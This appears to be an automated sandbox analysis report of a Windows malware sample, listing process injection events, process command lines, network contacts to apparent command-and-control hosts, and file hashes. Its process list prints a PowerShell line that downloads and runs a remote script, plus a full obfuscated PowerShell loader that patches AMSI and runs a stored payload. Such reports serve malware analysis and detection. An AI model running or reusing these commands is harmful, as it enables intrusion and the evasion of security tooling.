N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3628 wrote to memory of 2756 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3628 wrote to memory of 2756 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2756 wrote to memory of 4244 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\svchost32.exe
PID 2756 wrote to memory of 4244 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\svchost32.exe
PID 4244 wrote to memory of 808 N/A C:\Windows\svchost32.exe C:\Users\Admin\AppData\Local\Temp\x4s.exe
PID 4244 wrote to memory of 808 N/A C:\Windows\svchost32.exe C:\Users\Admin\AppData\Local\Temp\x4s.exe
PID 4244 wrote to memory of 4896 N/A C:\Windows\svchost32.exe C:\Users\Admin\AppData\Local\Temp\x4Shellcode.exe
PID 4244 wrote to memory of 4896 N/A C:\Windows\svchost32.exe C:\Users\Admin\AppData\Local\Temp\x4Shellcode.exe
PID 4244 wrote to memory of 4896 N/A C:\Windows\svchost32.exe C:\Users\Admin\AppData\Local\Temp\x4Shellcode.exe
PID 3820 wrote to memory of 4276 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 3820 wrote to memory of 4276 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 3820 wrote to memory of 4276 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 3820 wrote to memory of 4276 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 3820 wrote to memory of 4276 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 3820 wrote to memory of 4276 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 3820 wrote to memory of 4276 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 3820 wrote to memory of 4276 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 4276 wrote to memory of 588 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\winlogon.exe
PID 4276 wrote to memory of 644 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\lsass.exe
PID 4276 wrote to memory of 744 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 4276 wrote to memory of 900 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 4276 wrote to memory of 960 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\dwm.exe
PID 4276 wrote to memory of 356 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 4276 wrote to memory of 632 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 4276 wrote to memory of 596 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 4276 wrote to memory of 1048 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 4276 wrote to memory of 1132 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 4276 wrote to memory of 1236 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 4276 wrote to memory of 1244 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 4276 wrote to memory of 1252 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 4276 wrote to memory of 1312 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 4276 wrote to memory of 1400 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 4276 wrote to memory of 1420 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 4276 wrote to memory of 1460 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 4276 wrote to memory of 1472 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 4276 wrote to memory of 1544 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 4276 wrote to memory of 1580 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 4276 wrote to memory of 1596 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 4276 wrote to memory of 1708 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 4276 wrote to memory of 1716 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 4276 wrote to memory of 1724 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 4276 wrote to memory of 1776 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 4276 wrote to memory of 1808 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 4276 wrote to memory of 1940 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\spoolsv.exe
PID 4276 wrote to memory of 2000 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 4276 wrote to memory of 1216 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 4276 wrote to memory of 2172 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 4276 wrote to memory of 2212 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 4276 wrote to memory of 2224 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 4276 wrote to memory of 2296 N/A C:\Windows\System32\dllhost.exe C:\Windows\sysmon.exe
PID 4276 wrote to memory of 2316 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 4276 wrote to memory of 2372 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 4276 wrote to memory of 2380 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 4276 wrote to memory of 2400 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 4276 wrote to memory of 2420 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 4276 wrote to memory of 2632 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 4276 wrote to memory of 3000 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\wbem\unsecapp.exe
PID 4276 wrote to memory of 3008 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 4276 wrote to memory of 3024 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\sihost.exe
PID 4276 wrote to memory of 2840 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\taskhostw.exe
PID 4276 wrote to memory of 3256 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 4276 wrote to memory of 3396 N/A C:\Windows\System32\dllhost.exe C:\Windows\Explorer.EXE
PID 4276 wrote to memory of 3928 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\RuntimeBroker.exe
PID 4276 wrote to memory of 2140 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\DllHost.exe

Processes

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k dcomlaunch -s LSM

C:\Windows\system32\dwm.exe

"dwm.exe"

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s gpsvc

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s Schedule

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s Themes

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localservice -s EventSystem

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s UserManager

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localservice -s nsi

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s SENS

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k networkservice -s NlaSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k networkservice -s Dnscache

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k appmodel -s StateRepository

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localservice -s netprofm

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\spoolsv.exe

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent

C:\Windows\sysmon.exe

C:\Windows\sysmon.exe

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k networkservice -s CryptSvc

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s WpnService

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s Browser

C:\Windows\system32\wbem\unsecapp.exe

C:\Windows\system32\wbem\unsecapp.exe -Embedding

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc

c:\windows\system32\sihost.exe

sihost.exe

c:\windows\system32\taskhostw.exe

taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s TokenBroker

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localservice -s CDPSvc

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe

"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\system32\ApplicationFrameHost.exe

C:\Windows\system32\ApplicationFrameHost.exe -Embedding

C:\Windows\System32\InstallAgent.exe

C:\Windows\System32\InstallAgent.exe -Embedding

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\download (2).jpg"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Powershell "irm rentry.co/el3rabtweakpc/raw | iex"

C:\Windows\svchost32.exe

"C:\Windows\svchost32.exe"

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

C:\Users\Admin\AppData\Local\Temp\x4s.exe

"C:\Users\Admin\AppData\Local\Temp\x4s.exe"

C:\Users\Admin\AppData\Local\Temp\x4Shellcode.exe

"C:\Users\Admin\AppData\Local\Temp\x4Shellcode.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:VhHvpPjEINuB{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$FFtUTnlGmJqauN,[Parameter(Position=1)][Type]$tGcfIEGOpj)$mruFQuehGWB=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+'f'+''+'l'+'e'+[Char](99)+''+[Char](116)+''+'e'+''+[Char](100)+''+'D'+'e'+[Char](108)+''+'e'+''+'g'+''+'a'+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+[Char](77)+'e'+'m'+''+[Char](111)+''+'r'+''+'y'+''+[Char](77)+''+[Char](111)+'d'+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+'y'+''+[Char](68)+'e'+'l'+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+'e'+[Char](84)+''+[Char](121)+''+[Char](112)+'e',''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+'P'+''+[Char](117)+'b'+'l'+''+[Char](105)+''+'c'+','+[Char](83)+''+[Char](101)+''+[Char](97)+''+[Char](108)+''+'e'+''+[Char](100)+',A'+'n'+''+'s'+''+[Char](105)+'C'+[Char](108)+''+'a'+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](65)+''+'u'+''+'t'+''+'o'+''+'C'+''+[Char](108)+'as'+[Char](115)+'',[MulticastDelegate]);$mruFQuehGWB.DefineConstructor(''+'R'+''+[Char](84)+''+'S'+'p'+'e'+''+'c'+'i'+[Char](97)+''+[Char](108)+''+'N'+''+[Char](97)+''+[Char](109)+''+[Char](101)+','+[Char](72)+''+'i'+'de'+'B'+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+''+','+'P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$FFtUTnlGmJqauN).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+'t'+''+'i'+'m'+[Char](101)+''+','+'Ma'+'n'+''+[Char](97)+'ge'+[Char](100)+'');$mruFQuehGWB.DefineMethod(''+[Char](73)+'n'+'v'+''+[Char](111)+''+[Char](107)+'e',''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+'i'+''+[Char](99)+','+[Char](72)+''+'i'+''+[Char](100)+''+[Char](101)+''+[Char](66)+'y'+[Char](83)+'i'+[Char](103)+''+[Char](44)+'N'+[Char](101)+''+'w'+''+[Char](83)+''+[Char](108)+''+[Char](111)+''+[Char](116)+','+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+[Char](97)+''+'l'+'',$tGcfIEGOpj,$FFtUTnlGmJqauN).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+'i'+''+[Char](109)+''+[Char](101)+''+','+'Ma'+[Char](110)+''+[Char](97)+'g'+[Char](101)+'d');Write-Output $mruFQuehGWB.CreateType();}$DSUUkKlLhrBXt=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+'s'+[Char](116)+''+[Char](101)+''+'m'+''+[Char](46)+'d'+'l'+''+[Char](108)+'')}).GetType(''+[Char](77)+''+'i'+'cro'+[Char](115)+''+[Char](111)+'f'+'t'+'.'+[Char](87)+'i'+[Char](110)+''+[Char](51)+'2'+[Char](46)+''+[Char](85)+''+'n'+''+[Char](115)+''+'a'+''+[Char](102)+''+[Char](101)+'N'+[Char](97)+'t'+[Char](105)+'v'+[Char](101)+''+[Char](77)+''+[Char](101)+''+[Char](116)+'ho'+[Char](100)+''+[Char](115)+'');$VwgiibNDVOYwFv=$DSUUkKlLhrBXt.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+'Pr'+'o'+''+[Char](99)+''+[Char](65)+''+'d'+'d'+'r'+'e'+'s'+'s',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+'c'+''+','+''+[Char](83)+'t'+'a'+''+'t'+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$jTIjIEHYQUjgeApLTpL=VhHvpPjEINuB @([String])([IntPtr]);$eSMHrfaXqHvSgWeZlYTNkf=VhHvpPjEINuB @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$qsBaGPpLdzi=$DSUUkKlLhrBXt.GetMethod(''+'G'+'e'+[Char](116)+''+'M'+''+'o'+'d'+[Char](117)+''+[Char](108)+''+'e'+''+[Char](72)+''+[Char](97)+''+[Char](110)+''+'d'+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+''+'n'+''+'e'+''+[Char](108)+''+'3'+'2.'+[Char](100)+''+[Char](108)+'l')));$udjCjUxFdhyogm=$VwgiibNDVOYwFv.Invoke($Null,@([Object]$qsBaGPpLdzi,[Object](''+[Char](76)+''+'o'+''+'a'+'d'+'L'+''+[Char](105)+''+'b'+'r'+[Char](97)+''+'r'+''+[Char](121)+''+'A'+'')));$QtdkoMPmZmUWkfwSC=$VwgiibNDVOYwFv.Invoke($Null,@([Object]$qsBaGPpLdzi,[Object](''+'V'+'i'+[Char](114)+''+[Char](116)+''+'u'+'a'+'l'+''+[Char](80)+''+[Char](114)+'ot'+'e'+''+'c'+''+[Char](116)+'')));$UlCUYdf=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($udjCjUxFdhyogm,$jTIjIEHYQUjgeApLTpL).Invoke('a'+'m'+'s'+'i'+'.'+[Char](100)+''+'l'+''+[Char](108)+'');$RBbdyDBWoVyvGJQaI=$VwgiibNDVOYwFv.Invoke($Null,@([Object]$UlCUYdf,[Object](''+[Char](65)+''+'m'+'s'+[Char](105)+''+'S'+''+[Char](99)+''+[Char](97)+''+[Char](110)+''+[Char](66)+''+[Char](117)+''+[Char](102)+''+[Char](102)+''+[Char](101)+''+'r'+'')));$jmtryRnpAY=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($QtdkoMPmZmUWkfwSC,$eSMHrfaXqHvSgWeZlYTNkf).Invoke($RBbdyDBWoVyvGJQaI,[uint32]8,4,[ref]$jmtryRnpAY);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$RBbdyDBWoVyvGJQaI,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($QtdkoMPmZmUWkfwSC,$eSMHrfaXqHvSgWeZlYTNkf).Invoke($RBbdyDBWoVyvGJQaI,[uint32]8,0x20,[ref]$jmtryRnpAY);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+'T'+[Char](87)+'A'+'R'+''+'E'+'').GetValue('x'+[Char](52)+''+[Char](115)+''+[Char](116)+''+'a'+''+'g'+'e'+'r'+'')).EntryPoint.Invoke($Null,$Null)"

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{09255450-c7d6-474f-a178-62c699239393}

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /4

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x428

Network

Country Destination Domain Proto
US 8.8.8.8:53 rentry.co udp
US 104.26.3.16:80 rentry.co tcp
US 104.26.3.16:443 rentry.co tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 16.3.26.104.in-addr.arpa udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.109.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 i.ibb.co udp
FR 162.19.58.161:443 i.ibb.co tcp
US 8.8.8.8:53 161.58.19.162.in-addr.arpa udp
US 8.8.8.8:53 news-accept.gl.at.ply.gg udp
US 147.185.221.20:24727 news-accept.gl.at.ply.gg tcp
US 8.8.8.8:53 20.221.185.147.in-addr.arpa udp
US 8.8.8.8:53 wiznon.000webhostapp.com udp
US 145.14.144.70:443 wiznon.000webhostapp.com tcp
US 8.8.8.8:53 70.144.14.145.in-addr.arpa udp
US 8.8.8.8:53 wiz.bounceme.net udp
US 65.191.34.109:6000 wiz.bounceme.net tcp
US 147.185.221.20:24727 news-accept.gl.at.ply.gg tcp
US 147.185.221.20:24727 news-accept.gl.at.ply.gg tcp
US 147.185.221.20:24727 news-accept.gl.at.ply.gg tcp
US 65.191.34.109:6000 wiz.bounceme.net tcp
US 147.185.221.20:24727 news-accept.gl.at.ply.gg tcp
US 8.8.8.8:53 13.179.89.13.in-addr.arpa udp
US 8.8.8.8:53 25.24.18.2.in-addr.arpa udp
US 65.191.34.109:6000 wiz.bounceme.net tcp

Files

memory/2756-3-0x00007FF834293000-0x00007FF834294000-memory.dmp

memory/2756-5-0x0000021E677F0000-0x0000021E67812000-memory.dmp

memory/2756-9-0x0000021E679A0000-0x0000021E67A16000-memory.dmp

memory/2756-8-0x00007FF834290000-0x00007FF834C7C000-memory.dmp

memory/2756-10-0x00007FF834290000-0x00007FF834C7C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0iob1vnl.nia.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/2756-25-0x00007FF834290000-0x00007FF834C7C000-memory.dmp

memory/2756-30-0x0000021E68100000-0x0000021E682C2000-memory.dmp

C:\Windows\svchost32.exe

MD5 de68372979221ee19e301cd657bdb1b6
SHA1 4266ce79f32422735a99259c27749b6d7fbe158e
SHA256 720747405e106709767314b8a58bb754aee0f2bcc568440d757aaab17a181f6a
SHA512 3c80bf8e5dda4a7fb9837e7098f5682651026ba41396fb18221ba96fa61e22961abc22e60760e719ce5300663ba18877aed60bd2106198eb6bf69030ce4fee16

memory/4244-49-0x0000000000200000-0x0000000000234000-memory.dmp

memory/2756-50-0x00007FF834290000-0x00007FF834C7C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\x4s.exe

MD5 7d333fbc75b9264d3b631861794a7641
SHA1 165e2b6ad994fe9bab44154e3812b2e8825dfa76
SHA256 b98612934cc154c292502370baca4769f1fccad2c79c17237d23ffd5926180bf
SHA512 54408249ba56c7c19f41c8d35113f306f0fa62c6f5331993945504d09075977346eb40465107d4fab44159a46bd0048d8ea265d31b57d16294420552353175b3

C:\Users\Admin\AppData\Local\Temp\x4Shellcode.exe

MD5 8a7bee2c8cec6ac50bc42fe03d3231e6
SHA1 ebc599a15f061a70f6b3ee74b9acfa4e3b4d299d
SHA256 c8139f7fcde9c68cd331bcd438dfea7f02c463c6372dc477ab305da518483db8
SHA512 34370b6f162cb752b1cb91d689705e6f0f247e02744bbbe85347d20cd89e02aba7c5e9e22bb63acc49b4fdc062de12ccf24f481a18c18d2094e1506bb143cad5

memory/808-62-0x0000000000180000-0x000000000018E000-memory.dmp

memory/3820-86-0x000002CF2B2A0000-0x000002CF2B2CA000-memory.dmp

memory/3820-88-0x00007FF850140000-0x00007FF8501EE000-memory.dmp

memory/3820-87-0x00007FF8510D0000-0x00007FF8512AB000-memory.dmp

memory/4276-98-0x00007FF8510D0000-0x00007FF8512AB000-memory.dmp

memory/4276-99-0x00007FF850140000-0x00007FF8501EE000-memory.dmp

memory/4276-97-0x0000000140000000-0x0000000140008000-memory.dmp

memory/4276-92-0x0000000140000000-0x0000000140008000-memory.dmp

